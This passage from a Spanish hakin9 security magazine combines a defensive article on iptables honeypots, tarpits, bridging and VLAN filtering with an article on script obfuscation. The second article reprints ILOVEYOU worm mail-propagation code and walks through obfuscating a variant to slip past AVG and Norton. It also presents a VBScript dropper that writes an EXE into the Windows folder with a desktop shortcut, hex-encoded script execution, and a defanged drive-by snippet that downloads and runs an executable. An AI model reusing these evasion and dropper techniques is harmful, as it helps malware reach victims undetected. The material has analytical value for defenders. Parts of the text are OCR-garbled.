[10], estrategias y enfoques, desde los
muy simples a los muy complejos, que
www.hakin9.org/es
Cortafuegos
no necesariamente deben ser tecnológicos.
Algunos de estos honeypots
pueden emplearse en tu cortafuegos.
Uno de los muchos empleos de
los honeypots es confundir a los atacantes.
Cuando estos tratan de atacar
tu organización, ven un montón de
posibles víctimas, puertos abiertos,
protocolos, servicios, sistemas, redes,
etc., Esta informacion extra falsificada
a propósito hará que sea más difícil
para un atacante identificar recursos
valiosos, es decir, cuando existe información
sensible, y esto típicamente
los obligará a ser menos sigilosos en
sus ataques, aumentando la probabilidad
de ser descubiertos.
¿Cómo puedes hacer esto con tu
cortafuegos? Esta implementación es
simple; se emplean las capacidades
de REDIRECT de Netfilter/IPtables.
Inicialmente, un honeypot fue un programa
inventado por George Bakos
denominado The Tiny Honeypot [11]
(THP), o tarrito de miel, que empleó
esta estrategia entre otras. THP estaba
formado por conjunto de scripts dedicados
a la recolección de malware.
La idea fue muy simple: todos los
puertos en un sistema particular de
Linux serían redirigidos a un simple
puerto donde el oyente, de tipo netcat
en el caso más simple, o bien enterado
del servicio en el más sofisticado,
respondería a los intentos de conexión
y registraría los datos intercambiados,
que en varias ocasiones incluyen
malware. Las entradas de Netfilter/IPtables
que lo permitían serán:
iptables -t nat -N thp-redir
iptables -t nat -A PREROUTING
-i $EXTIF -p tcp --tcp-flags
FIN,SYN,RST,ACK SYN
-m limit --limit 60/minute
-j thp-redir
iptables -t nat -A thp-redir
-p tcp -j REDIRECT
--to-ports 31337
No vamos a profundizar más sobre
THP, ya que ha sido sustituido por
una potente aplicación denominada
Nepenthes [12].
Existe otro enfoque muy interesante
acerca del empleo de los honeypots
en tu cortafuegos. Se trata del modo
13

kit
Tarpit. Tarpit, a veces denominado
Honeypot pegajoso, es un tipo de
Honeypot defensivo cuya misión es
la de ralentizar las conexiones de
red, como las que se observan típicamente
cuando un ataque proveniente
de gusanos de Internet afecta a una
organización.
Como deberías saber, las conexiones
TCP se establecen en 3
fases; SYN, SYN-ACK y ACK, también
conocido como saludo TCP de
tres vías. El truco que Tarpit utiliza es
que cuando un host malicioso intenta
conectarse a un puerto inactivo de un
sistema es contestar a la petición de
conexión maliciosa para luego dejar
de responder.
El host malicioso tratará entonces
de verificar durante un tiempo determinado,
normalmente ente 10 y 20
minutos si la conexión se encuentra
o no activa antes de que el tiempo de
prueba se agote.
La ventaja que supone esta técnica
es que la cantidad de tiempo y energía
que el sistema malicioso o infectado
ha gastado intentando infectar a Tarpit
permitirá que este no pueda comprometer
otros sistemas potencialmente
vulnerables de la red (el host malicioso
solamente tiene una cierta cantidad de
stamina, o lo que es lo mismo, un cantidad
limitada de conexiones que puede
mantener abiertas).
Existen muchas aplicaciones que
pueden hacer Tarpitting. La primera y
más popular es LaBrea [11], que nació
para luchar contra el gusano Code
Red y en su versión 2 implementó
incluso un mecanismo más sofisticado
que el que se ha descrito en el párrafo
anterior.
Netfilter/IPtables introdujo un nuevo
objeto denominado TARPIT que
imita el comportamiento de LaBrea
versión 1. Imagínate que sufres una
infección por un gusano en el puerto
número 31337/TCP. Lo que puedes
hacer es simplemente crear la siguiente
entrada en tu cortafuegos:
iptables -A INPUT -p tcp -m
tcp --dport 31337 -j TARPIT
A partir de este momento, siempre que
un host malicioso o infectado realice
un escaneo al puerto 31337 TCP será
tratado por Tarpit en el cortafuegos.
¿Simple, verdad?
Si deseas aumentar el impacto,
puedes redirigir a nivel de router las
direcciones IP no utilizadas de a un
sistema GNU/Linux que no actúe como
router.
Luego, simplemente activa IP
forwarding, y añade las siguientes
líneas:
iptables -A FORWARD -p tcp -j TARPIT
iptables -A FORWARD -j DROP
Ten en cuenta que el módulo correspondiente
a Tarpit puede no estar
activado o incluso no configurado en
el kernel.
Cortafuegos
transparentes
Existe una manera muy interesante
y útil de emplear tu cortafuegos,
consiste en el Modo Transparente, es
decir, a nivel de capa 2, sin funciones
de enrutamiento. No todos los cortafuegos,
especialmente los comerciales,
soportan esta funcionalidad. Sin
embargo, los dos más populares de
código abierto, Netfilter/IPtables y
Packet Filter sí la soportan.
Honestamente, la capacidad de
un cortafuegos para utilizar la funcionalidad
de transparencia no depende
exclusivamente del código del corta-
En la Red
14 www.hakin9.org/es
fuegos sino que además, el sistema
operativo debe ser capaz de actuar
en modo bridge, también conocido
como modo puente. Como se demostró
más arriba, tanto los sistemas
GNU/Linux como OpenBSD entre
otros, soportan esta característica.
¿Cómo lo haremos por ejemplo en
sistemas GNU/Linux? De una manera
muy simple.
Para crear un puente de red,
obviamente necesitaremos al menos
dos interfaces de red, como por
ejemplo, eth0 y eth1. Estas interfaces
no tendrán ninguna dirección IP. Sin
embargo, se pueden asignar una o
varias aisgnadas si se desea.
El siguiente paso una vez que hemos
configurado las interfaces de red
es crear un puente entre las dos, por
ejemplo br0:
ifconfig eth0 0.0.0.0 up -arp
# Bring up eth0 (no esperaremos
respuesta de tipo ARP)
ifconfig eth1 0.0.0.0 up -arp
# Bring up eth1 (no esperaremos
respuesta de tipo ARP)
brctl addbr br0
# Crear puente br0
brctl addif br0 eth0 #
Conectar eth0 al puente br0
brctl addif br0 eth1 #
Conectar eth1 al puente br0
ifconfig br0 0.0.0.0 up -arp
# Traer el puente br0
• http://www.snort.org – Snort, [1]
• http://www.jessland.net/JISK/IDS_IPS/Log_Analysis/Tools.php – Log Analysis,
SIM & SEM Tools, [2]
• http://www.cipherdyne.org/psad/ – PSAD, [3]
• http://www.cipherdyne.org/fwsnort/ – fwsnort, [4]
• http://swatch.sourceforge.net/ – swatch, [5]
• http://www.awprofessional.com/title/0321349962 – Extrusion Detection: Security
Monitoring for Internal Intrusions – Richard Bejtlich – Ed. Addison-Wesley; ISBN
0321349962, [6]
• http://www.honeynet.org/tools/cdrom/: Honeywall CD-ROM, [7]
• http://project.honeynet.org – The Honeynet Project, [8]
• http://www.securityfocus.com/archive/119 – Honeypots mailing List at Securityfocus,
• http://www.jessland.net/Honeypots/Types.php – Honeypot Types, [10]
• http://www.alpinista.org/thp/ – The Tiny Honeypot, [11]
• http://nepenthes.mwcollect.org/ – Nephentes, [12]
• http://www.hack-busters.net/LaBrea/ – LaBrea, [13]
• http://www.jessland.net/JISK/Architecture.php – Security Architecture. [14]

Sobre el Autor
Jess Garcia, fundador de la compañía JSS (Jessland Security Services) es ingeniero
superior de seguridad que trabaja para organizaciones gubernamentales, comerciales,
financieras y de telecomunicaciones en Europa, América Latina, Canadá y
Estados Unidos. Además, es instructor autorizado por el Instituto SANS en varias
disciplinas de seguridad. Jess posse un Máster en Ingeniería de Telecomunicaciones
por la Universidad Politécnica de Madrid y con frecuencia realiza ponencias en acontecimientos
internacionales. Jess es autor del libro Securing Solaris 8 & 9. Using the
Center for Internet Security Benchmark y ha colaborado en muchos otros, incluyendo
varios materiales de cursos impartidos por el instituto SANS. También es el autor de
muchos estándares de seguridad para la administración en Español.
Ahora puedes unir las reglas estándar
de cortafuegos a la interfaz apropiada.
Por ejemplo, para permitir el tráfico
DNS a tu servidor DNS:
iptables -A FORWARD -p tcp
-m physdev --physdev-in eth0
-d dnsserver \--dport 53 -j ACCEPT
iptables -A FORWARD -p udp
-m physdev --physdev-in eth0
-d dnsserver \
--dport 53 -j ACCEPT
Cortafuegos virtuales
Como probablemente hayas podido
percibir, el mundo de la computación
se está convirtiendo poco a
poco en un mundo virtual.
Ha pasado mucho tiempo desde
que nuestros sistemas son tan
potentes, que durante la mayor
parte del tiempo no están trabajando,
y nuestras redes de banda
ancha apenas tampoco. Eso si,
siempre y cuando no se estén utili-
P U B L I C I D A D
REKLAMA
www.hakin9.org/es
Cortafuegos
zando aplicaciones Peer-to-Peer.
Esta situación salió de la mano de la
virtualización.
En el mundo de los sistemas es
de sobra conocidas las tecnologías
de virtualización tales como Vmware,
Virtual PC, Xen o Parallels, que permiten
a los usuarios emplear diferentes
sistemas operativos al mismo tiempo
en entornos emulados físicamente
inexistentes.
En el mundo de redes, hace bastante
tiempo que las redes virtuales de
área local (VLAN) resultaron ser una
tecnología muy útil, incluso teniendo
en cuenta que las VLANs no son consideradas
por la comunidad de expertos
de seguridad como un mecanismo
seguro de segmentación de red.
Estas VLANs constituyen una
manera de dividir un dispositivo de
commutación o switch en una serie
entornos o redes independientes.
Para que resulte más fácil la comprensión
de este concepto, imagine-
15

kit
mos que tenemos que agrupar todos
los conectores de un conmutador o
switch en grupos según deseemos, y
de esta manera, un host que pertenezca
a una red virtual o VLAN no será
capaz de comunicarse con otro grupo
hasta que la comunicación se produzca
a través de un encaminador o router
, aunque a veces el conmutador puede
también actuar como encaminador.
Sin embargo, no entraremos en
este aspecto por ahora.
Existe un concepto denominado
trunking que permite unir diferentes
VLANs mediante uno de los puertos
del conmutador. Esto resulta muy útil
cuando se desea ampliar una VLAN
utilizando diferentes conmutadores o
cuando cuando queramos desviar todo
el tráfico al dispositivo que realiza
el encaminamiento o el filtrado basado
en VLAN, como por ejemplo, un
cortafuegos virtual. Sin embargo te
puedes preguntar, ¿cómo identificaremos
qué paquete pertenece a qué
VLAN cuando todas las VLAN viajan
en el mismo cable?
El estándar 802.1q, que define
el comportamiento de las VLAN nos
dice que para identificar a qué VLAN
pertenece un determinado frame o
marco (este tipo de tramas se denominan
frames o marcos cuando nos
referimos a la capa de red) se añade
a este una etiqueta de identificación
que corresponde al número de
VLAN desde donde se ha generado
la trama.
Las grandes compañías comerciales,
especialmente las que se
dedican a la redes y su seguridad,
dedican mucho esfuerzo e interés en
integrar las VLANs con la infraestructura
de red existente (en un esfuerzo
de crear lo que ellos ellos llaman Tejido
de red seguro.
Todo esto significa que obviamente
el soporte de VLAN es un requisito
en los cortafuegos actuales y futuros.
Afortunadamente, los cortafuegos de
código abierto cumplen con esta normativa
ya que soportan el filtrado basado
en VLAN desde hace tiempo.
Como habremos podido imaginar,
para operar en un entorno VLAN,
deben existir previamente interfaces
que soporten el protocolo VLAN,
osea, que sean capaces de entender
el tráfico 802.1q. En GNU/Linux es
bastante simple realizar esto mediante
el comando siguiente:
vconfig add eth0 2
Esto crearía una interfaz virtual
eth0.2 que podría conectarse a la
VLAN 2, a condición de que la tarjeta
de red eth0 esté conectada al puerto
trunk, y de que el host con sistema
GNU/Linux tenga el módulo 8021q
cargado en el kernel (podremos realizar
esto con el comando modprobe
8021q) y las utilidades necesarias de
VLAN instaladas. Ahora podríamos
crear una regla en el cortafuegos
para controlar la nueva interfaz de
forma intuitiva:
iptables -i eth0.2 -A INPUT -j DROP
Esta regla rechazaría de forma predeterminada
todo el tráfico entrante
en la interfaz eth0.2 de la VLAN 2.
Todavía mucho más
Si echamos un vistazo al potente
cortafuegos que es Packet Filter
(PF), observarás que aún queda
mucho por tratar:
• Honeypotting utilizando demonios
tales como spamd que permiten
luchar contra el correo electrónico
no deseado.
• Capacidad de reconocimiento
pasivo del sistema de PF, tecnología
que permite la identificación
de un sistema operativo remoto
mediante la inspección simple de
las cabeceras de los paquetes,
y que además permite aplicar
reglas que afectan al sistema
operativo remoto que intenta
conectarse a tu cortafuegos,
• Empleo de las características de
QoS (Calidad de Servicio) para
reservar ancho de banda para
aplicaciones críticas,
• Alta disponibilidad, que en el caso
de PF está basada en un protocolo
abierto denominado CARP,
y que permite asegurarte de que
tu infraestructura es resistente a
16 www.hakin9.org/es
ciertas interrupciones a nivel del
cortafuegos,
• Normalización de paquetes, que
suministra a PF la capacidad de
proteger sistemas antiguos cuyas
pilas TCP/IP son vulnerables.
Esto se consigue modificando las
características de las tramas de
red salientes, como por ejemplo,
el número de secuencia de TCP,
• Authpf, un potente mecanismo
para realizar filtrado a nivel de
usuario.
De igual modo, existen herramientas
comerciales que implementan muchos
de los aspectos que hemos tratado
en este artículo, y algunos más.
Un campo que los cortafuegos
comerciales han tenido en el punto
de mira durante mucho tiempo es
el de la inspección de contenido.
Cómo los ataques dirigidos a los
clientes se hacen más frecuentes
día a día, la necesidad de inspeccionar
el tráfico en la capa de aplicación,
por ejemplo el tráfico web
o el tráfico de correo electrónico
llega a ser una necesidad creciente.
Por otro lado, las organizaciones
se preocupan de a dónde
acceden sus empleados cuando
exploran Internet, por ejemplo, a
páginas pornografía y desean evitar
el tráfico proveniente de este
tipo de sitios.
En ambos casos, el cortafuegos
necesitará utilizar criterios más sofisticados
de filtrado para cumplir con la
política de la compañía. Esto se realiza
sobre todo para tráfico malicioso,
a veces incluso cuando está presente
malware relativamente sofisticado
Sin embargo, la inspección y
análisis de contenido, especialmente
cuando es demasiado intensa ralentizará
considerablemente el tráfico
de red, cosa que no queremos que
ocurra.
Por ello, los fabricantes de
cortafuegos inventaron protocolos
que permiten que sus productos se
integren con dispositivos externos
diseñados especialmente para realizar
este tipo de trabajo, como por
ejemplo, el conocido OPSEC de la
compañía Checkpoint). l

Ofuscación para
principiantes
Laic Aurelian
Hay muchos programas llamados ofuscadores
utilizados para transformar
código para prevenir la ingeniería
inversa, para reducir los ficheros de clases
y ejecutables o para proteger la propiedad
intelectual del código. Herramientas como
Script Encoder permiten a los diseñadores
de scripts codificar sus scripts para que los
clientes y los servidores no puedan ver o modificar
su código fuente. Estas herramientas
aseguran la absoluta integridad del código
fuente escrito en VBScript, Jscript y otros, de
hecho estas herramientas no usan encriptación
y es relativamente fácil decodificar esos
scripts. También hay programas diseñados
para decodificar scripts codificados con estas
herramientas (Windows Script Decoder
es un ejemplo para scripts codificados con
Windows Script Encoder). Estos programas
codificados protegen el código fuente a los
principiantes, porque los usuarios más avanzados
pueden fácilmente leer el código fuente.
Pero el verdadero peligro viene de otro
tipo de uso de la ofuscación: muchos hackers
usan la ofuscación para esconder código malicioso
o para engañar a los antivirus. Y eso
es de lo que trata este artículo.
18 www.hakin9.org/es
De acuerdo con Wikipedia
ofuscación es encubrir el
significado de una comunicación
haciéndola más confusa y
difícil de interpretar. Por eso el
Código ofuscado es un código
fuente intencionadamente
transformado para que sea muy
difícil de leer y comprender.
Ofuscación
y transformación de virus
Para comenzar, analizaremos un virus clásico
deniminado Love letter. Este virus de correo
apareció en el 2000 y se susedieron múltiples
variantes, usa el lenguaje VBScript y en esencia
hace lo siguiente:
• Se propaga usando Outlook: se auto envía
a todos los contactos de la libreta de direcciones.
También utiliza mIRC para su propagación
insertando un script a medida.
• Infecta todos los ficheros VBS de la máquina
infectada y sobrescribe todos los archivos jpg
• Intenta descargarse de Internet un determinado
archivo.exe.
En este artículo aprenderás
• Conocimiento básico de código ofuscado
• Como usar la ofuscación para engañar a los
antivirus.
Lo que deberías saber
• Como usar VBScript y ofuscación.

Listado 1. Código del virus original
rem ****************
sub spreadtoemail()
rem ****************
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_
DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntr
ies.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntr
ies.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
rem ****************
Listado 2. Código transformado
spreatoemail
sub spreadtoemail()
rem ****************
On Error Resume Next
Dim out, mapi, i, x, malead
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for i=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(i)
for j=1 to a.AddressEntries.Count
malead=a.AddressEntries(j)
msgbox malead
next
next
Set out=Nothing
Set mapi=Nothing
end sub
www.hakin9.org/es
Ofuscación
Al realizar una búsqueda simple
en cualquier buscador encontraremos
el código fuente completo
de este virus. El comportamiento
más importantes de este virus es
la propagación usando el correo y
Microsoft Outlook. No se analizará
todo el código y algunas de las
secciones de código del virus serán
transformadas (Listado 1). No
utilizar este código o usarlo sólo
en una máquina de pruebas. No
se utilizará este código por que es
muy peligroso, pero el mismo será
transformado manteniendo su funcionalidad.
Copiar el siguiente código
en un nuevo archivo de texto
y guardarlo con extensión .vbs. el
mismo mostrará un mensaje en un
cuadro de diálogo con cada una de
las direcciones de correo encontradas
en la libreta de direcciones de
la maquina de prueba (Listado 2).
Analizar el fichero con un programa
antivirus (para este ejemplo se
utilizó AVG). El programa antivirus
notificará que es un posible virus.
Debería mostrar un mensaje del tipo
Podría estar infectado con el virus
VBS/ILoveYou. Si el programa
Listado 3. Código ofuscado
spreadtoemail
sub spreadtoemail()
rem ****************
On Error Resume Next
Dim out, mp, i, x, malead
Dim s1, s2, s3, s4, s5
s1="Out"
s2="look."
s3="A"
s4="pplication"
s5=s1 & S2 & s3 & s4
set out=WScript.CreateObject(s5)
s1="M"
s2="A"
s3="P"
s4="I"
s5=s1 & S2 & s3 & s4
set mp=out.GetNameSpace(s5)
for i=1 to mp.AddressLists.Count
set a=mp.AddressLists(i)
for j=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
msgbox malead
next
next
Set out=Nothing
Set mapi=Nothing
end sub
19

kit
Listado 4. Ejemplo de uso de la función Obfusc
Function Obfusc(ind)
Dim s1, s2, s3, s4, s5, s6
Dim r1, r2, r3, r4, r5, r6, r7
s1= "d"
s2="b"
s3="r"
s4="c"
s5="s"
s6="t"
s7="m"
r1="a"
r2="e"
r3="o"
r4=r1 & s1& r3 & s1 & s2
Select case ind
case 1
r5=r4 & "." & s3 & r2 & s4 & r3 & s3 & s1 & s5 & r2 & s6
'msgbox r5
Obfusc=r5
case 2
r6=r4 & "." & s5 & s6 & s3 & r2 & r1 & s7
'msgbox r6
Obfusc=r6
end select
end function
‘Converts binary data to a string (BSTR) using ADO recordset.
Function RSBinaryToString(xBinary)
Dim Binary
'MultiByte data must be converted To VT_UI1 | VT_ARRAY first.
If vartype(xBinary)=8 Then Binary = MultiByteToBinary(xBinary) Else Binary = xBinary
Dim RS, LBinary
Const adLongVarChar = 201
Set RS = CreateObject(obfusc(1))
LBinary = LenB(Binary)
If LBinary>0 Then
Else
RS.Fields.Append "mBinary", adLongVarChar, LBinary
RS.Open
RS.AddNew
RS("mBinary").AppendChunk Binary
RS.Update
RSBinaryToString = RS("mBinary")
RSBinaryToString = ""
End If
End Function
‘Read Binary file
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject(obfusc(2))
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
BinaryStream.Close
End Function
‘Save a byte array into a file
Sub saveFile(FileName, ByteArray)
Dim bs
Set bs = CreateObject(obfusc(2))
bs.Type = 1
bs.Open
bs.Write ByteArray
bs.SaveToFile FileName, 2
End Sub
20 www.hakin9.org/es
antivirus no lo reconoce como un
posible virus, probablemente esta
aplicación tenga algún problema.
A continuación se ofuscará código
para engañar al programa antivirus. En
este ejemplo se realizará la ofuscación
manualmente (Listado 3). Copiar el
siguiente código en un nuevo archivo
de texto y guardarlo con extensión
.vbs. Este script también debe mostrar
un cuadro de diálogo con cada una de
las direcciones de correo encontradas
en la libreta de direcciones. Al analizar
el fichero con un programa de antivirus
(para este ejemplo se utilizó AVG). Si
el antivirus notifica que es un posible
virus es que tu antivirus es realmente
bueno. En el ejemplo, AVG no detecta
nada sospechoso. Estos ejemplos
también han sido analizados con
Norton Internet Security pero ambos
scripts, parecen ser correctos para este
programa. En este primer ejemplo
se han recuperado todas las direcciones
de la libreta de direcciones y
no se ha usado un codificador especial
para ofuscar el código fuente.
Ocultando
ejecutables usando
VBScript y ofuscación
Normalmente los archivos HTML son
seguros de abrir y no causan ningún
daño en nuestro sistema. ¿Es esto
cierto? Los aparentemente inocentes
archivos HTML podrían contener un
fichero EXE malicioso, y utilizando
scripts embebidos dentro de las páginas
HTML podrían fácilmente instalar
y ejecutar programas ejecutables.
Por lo general, ADODB.Stream y
ADODB.Recordset son utilizados por
el código malicioso para escribir un
contenido embebido desde el exterior
al disco local. Muchos ofuscadores
utilizan un diccionario para ocultar
una acción pero aquí la misma sera
construida manualmente. En el siguiente
ejemplo (Listado 4) se usa
una función llamada Obfusc que codifica
esas cadenas (ADODB.Stream y
ADODB.Recordset). En este ejemplo
pueden verse otras tres funciones que
también usan esta función:
• Convierte de binario a cadena
de caracteres (BSTR) utilizando

un conjunto de registros ADO
(Function RSBinaryToString)
• Lee un fichero binario (Function
ReadBinaryFile)
• Guarda un fichero (Function
saveFile)
El siguiente script (Listado 5) creará
unos ficheros EXE en el directorio de
Windows y un acceso directo. Para
probar el código es necesario reemplazar
tanto del ejecutable
como del acceso directo con
el código hexadecimal de ejecutable y
acceso directo del ejemplo.
Métodos y técnicas
de ofuscación
1.Reemplazar nombres por otros
sin sentido, preservando una correcta
sintaxis del código fuente.
Por ejemplo una variable llamada
Nombre_Archivo será reemplazada
por algo como abxcdfgd96rtg, lo
cual no significa nada y es difícil de
comprender.
• Sustituir valores numéricos por
una expresión aritmética aleatoria
o constante para el mismo valor
numérico, valores decimales y
hexadecimales que evalúan el mismo
valor.
• Quitar los espacios extras y los
comentarios
• Sustituir los nombres de las subrutinas
y funciones por nombres
sin significado. Es obvio lo que
hace una rutina llamada:
Sub Guardar_Archivo(File_
Name,ByteArray)
[instrucciones]
End sub
Pero es muy difícil descubrir que hace
una rutina como:
Sub asdadf12f32sfsd(Ffgsds54,jdhffhska
ka32)
[instrucciones]
end sub
El código ofuscado es extremadamente
difícil de entender por una persona,
cuando el nombre de las variables,
subrutinas y otros símbolos no tienen
ningún sentido y son difíciles de recordar
cuando se intenta comprender el
código. La más común de las técnicas
de ofuscación es aquella que cambia
las variables y los nombres de las
funciones por palabras largas y sin
sentido. Pero cuando son usadas para
Listado 5. Script de ficheros EXE
On Error Resume Next
Dim o,s,dirsys,ico,f,term,g,Des,Shortcut
Dim o1,o2,o3,o4,o5,o6,o7
o3=“ting.”
o4=”fil”
o2=”rip”
o6=”bject”
o1=”Sc”
o5=”esystemo”
o7=o1 & o2 & o3 & o4 & o5 & o6
Set o=CreateObject(o7)
Set s=CreateObject("WScript.Shell")
Set dirsys=o.GetSpecialFolder(0)
ico=split("",")
Set f=o.CreateTextFile(dirsys&"\demoicon.ico",true)
For i=0 To UBound(ico)
f.Write chr(Int("&H"&ico(i)))
Next
f.close
term=split("4D,5A,00,"",",")
Set g=o.CreateTextFile(dirsys & "\demo” & “.e” & “xe",true)
For i=0 To UBound(term)
g.Write chr(Int("&H"&term(i)))
Next
g.close
If not s Is Nothing Then
www.hakin9.org/es
Ofuscación
propósitos maliciosos, hay muchos
otros trucos que son usados por los
hackers para ocultar sus acciones y
en muchos de los casos ellos no usan
los programas y métodos clásicos de
Des = s.SpecialFolders("Desktop")
Set Shortcut = s.CreateShortCut(Des & "\Demo Scene" & ".lnk")
Shortcut.TargetPath = dirsys & "\demo” & “.e” & “xe"
Shortcut.WorkingDirectory = "c:\\"
Shortcut.WindowStyle = 1
Shortcut.Arguments = ""
Shortcut.IconLocation = dirsys&"\demoicon.ico,0"
Shortcut.Save
Set Shortcut = Nothing
end if
Listado 6. Script para Windows NT 4.0 y Windows 98
Dim refferrer1, i
refferrer1="436F6E7374204D595F444F43554D454E5453203D202648352600536574206F62
6A5368656C6C203D204372656174654F626A65637428225368656C6C2E4170706C6963617469
6F6E222900536574206F626A466F6C646572203D206F626A5368656C6C2E4E616D6573706163
65284D595F444F43554D454E54532900536574206F626A466F6C6465724974656D203D206F62
6A466F6C6465722E53656C6600577363726970742E4563686F206F626A466F6C646572497465
6D2E506174680053657420636F6C4974656D73203D206F626A466F6C6465722E4974656D7300
466F722045616368206F626A4974656D20696E20636F6C4974656D7300202020205773637269
70742E4563686F206F626A4974656D2E4E616D65004E65787400"
Function decode(x)
For i = 1 To Len(x) Step 2
If Mid(x, i, 2) = "00" Then
decode = decode & vbCrLf
Else
decode = decode & Chr(Int("&H" & Mid(x, i, 2)))
End If
Next
End Function
21

kit
ofuscación, por lo que el trabajo de
perención se torna muy difícil.
Los siguientes ejemplos ilustrarán
una técnica frecuentemente
utilizada por los hackers. Han sido
adaptados de un ejemplo real y
Listado 7. Código oculto
Const MY_DOCUMENTS = &H5&
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace(MY_DOCUMENTS)
Set objFolderItem = objFolder.Self
Wscript.Echo objFolderItem.Path
Set colItems = objFolder.Items
For Each objItem in colItems
Wscript.Echo objItem.Name
Next
un código como este (Listado 6)
puede ser fácilmente localizado en
muchos sitios web. Aparentemente
este código parece normal y no
sospechoso. Y en este caso lo es,
mostrará el contenido del directorio
Listado 8. Transformando un script a su código hexadecimal
'fso
'create the object
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
Dim outputFile
'A file where we will save the hex equivalent
outputFile = "C:\Hex.txt" ‘The
Dim txtstreamout
Set txtStreamOut = fso.OpenTextFile(OutputFile, 2, True)
'The script which want to convert into hex
Dim inputFile
inputFile = "C:\Myscript.vbs"
Dim txtstreamin
Set txtStreamIn = fso.OpenTextFile(inputFile, 1, True)
dim text
Do while txtstreamin.atendofstream=false
text=txtStreamin.readline
txtStreamOut.write gethex(text) & "00"
Loop
Function GetHex(text)
dim i
dim u
For i=1 to len(text)
u=asc(mid(text,i,1))
getHex=gethex & hex(u)
Next
End function
Listado 9. Código usado por un sitio web maliciosos
m1="object"
m2="classid"
m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
m4="Microsoft.XMLHTTP"
m5="Shell.Application"
MircoLong="hxxp://www.xvg[replaced content]"
'…
set MircoLonge=MircoLongc.createobject(m5,"")
MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0
'…
22 www.hakin9.org/es
Mis Documentos. Devolverá la ruta
del directorio Mis Documentos, y
listará todos los objetos encontrados
en ese directorio. Es un script
para Windows NT 4.0 y Windows
98, este script requiere Windows
Script Host 5.1 e Internet Explorer
4.0 o superior. Lo que hay dentro
de este (lo que ejecuta la instrucción
Execute) es el siguiente código
(Listado 7). Para transformar un
script en su equivalente hexadecimal,
el siguiente código podría ser
muy útil. Reemplazar las rutas con
las propias y podremos transformar
cualquier script (Listado 8).
En todo lo visto anteriormente,
estas secuencias de código
son totalmente inocentes, pero
un método como este fue recientemente
usado por un sitio web
malicioso donde la secuencia de
contenido codificado, decodificado
se parecía a este (Listado 9). El
código se aprovecha de una vulnerabilidad
llamada Drive-by exploits,
descarga un ejecutable desde el
mismo servidor y lo ejecuta en
el sistema de la víctima. Hay que
tener en cuenta que es bastante
frecuente que quien gestiona esos
servidores web cambie el código
malicioso a menudo para reducir
el riesgo de ser detectados por los
antivirus. Otra técnica es el método
de partición para dividir algunas
condiciones. No es recomendable
probar el método ilustrado en
el siguiente ejemplo (Listado 10)
aunque algunos elementos fueron
reemplazados y el mismo ya fue
ilustrado en algunos de los ejemplos
anteriores.
Algunas de las técnicas de
ofuscación utilizan la naturaleza dinámica
de Javascript (una porción
de código es almacenada como
una cadena encriptada, la cual es
desencriptada y evaluada). Esto
puede hacerse varias veces. Otras
técnicas incluyen la inserción de
código de imitación, así como enlaces
HTML de imitación para legitimar
páginas. Pero probablemente
los mayores fans de la ofuscación
sean los spammers. Ellos usan
Javascript ofuscado, VBScript o

código HTML en los mensajes
de spam. El mensaje ofuscado,
cuando es mostrado por un cliente
de correo que interprete HTML,
aparece como un mensaje razonablemente
normal. Sin embargo,
cuando se examina el código fuente,
las ofuscaciones hacen muy
difícil a los investigadores discernir
donde apuntan los enlaces, o que
hace el código. Diariamente pueden
encontrarse muchos ejemplos
de código ofuscado en el buzón de
correo. El código fuente de cualquier
mensaje de spam puede sorprender
a muchos (Listado 11). La
mayoría de los mensajes de spam
incluyen muy buenos ejemplos de
código ofuscado.
Conclusión
El ofuscador de código es un programa
que codifica el código fuente
para hacer que el programa sea
difícil de comprender o para evitar
la ingeniería inversa.
El hecho de que sea un lenguaje
interpretado que es ejecutado desde
su código fuente original, lenguajes
de script tales como JavaScript o
VBScript están abiertos a inspección
pública. Sin la ofuscación de código,
el código fuente puede ser fácilmente
copiado y modificado para ser
usado para otros propósitos.
La función básica de un ofuscador
es hiper-complicar el código
fuente a los lectores, para que no
pueda ser decompilado con éxito.
También existen des-ofuscadores,
los cuales hacen el trabajo inverso.
Una práctica común en la ofuscación
es renombrar cada clase desde algo
descriptivo como Copiar_Fichero, a
alguna secuencia sin sentido como
fugjfgfg3253fggjh. Los métodos de
clase también son renombrados a
func _ a(), func _ b(), etc. Muchos
hackers usan las técnicas de ofus-
Sobre el Autor
Laic Aurelaian es Ingeniero Rumano
independiente, revelador de software.
Por más informaciones por favor ver
páginas: http://xidie.ro
Listado 10. Ejemplo del metodo de partición
On error resume next
clID1 = "clsi"
clID2 = "d:BD96C[Replaced]"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "AdCount.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "[replaced]"
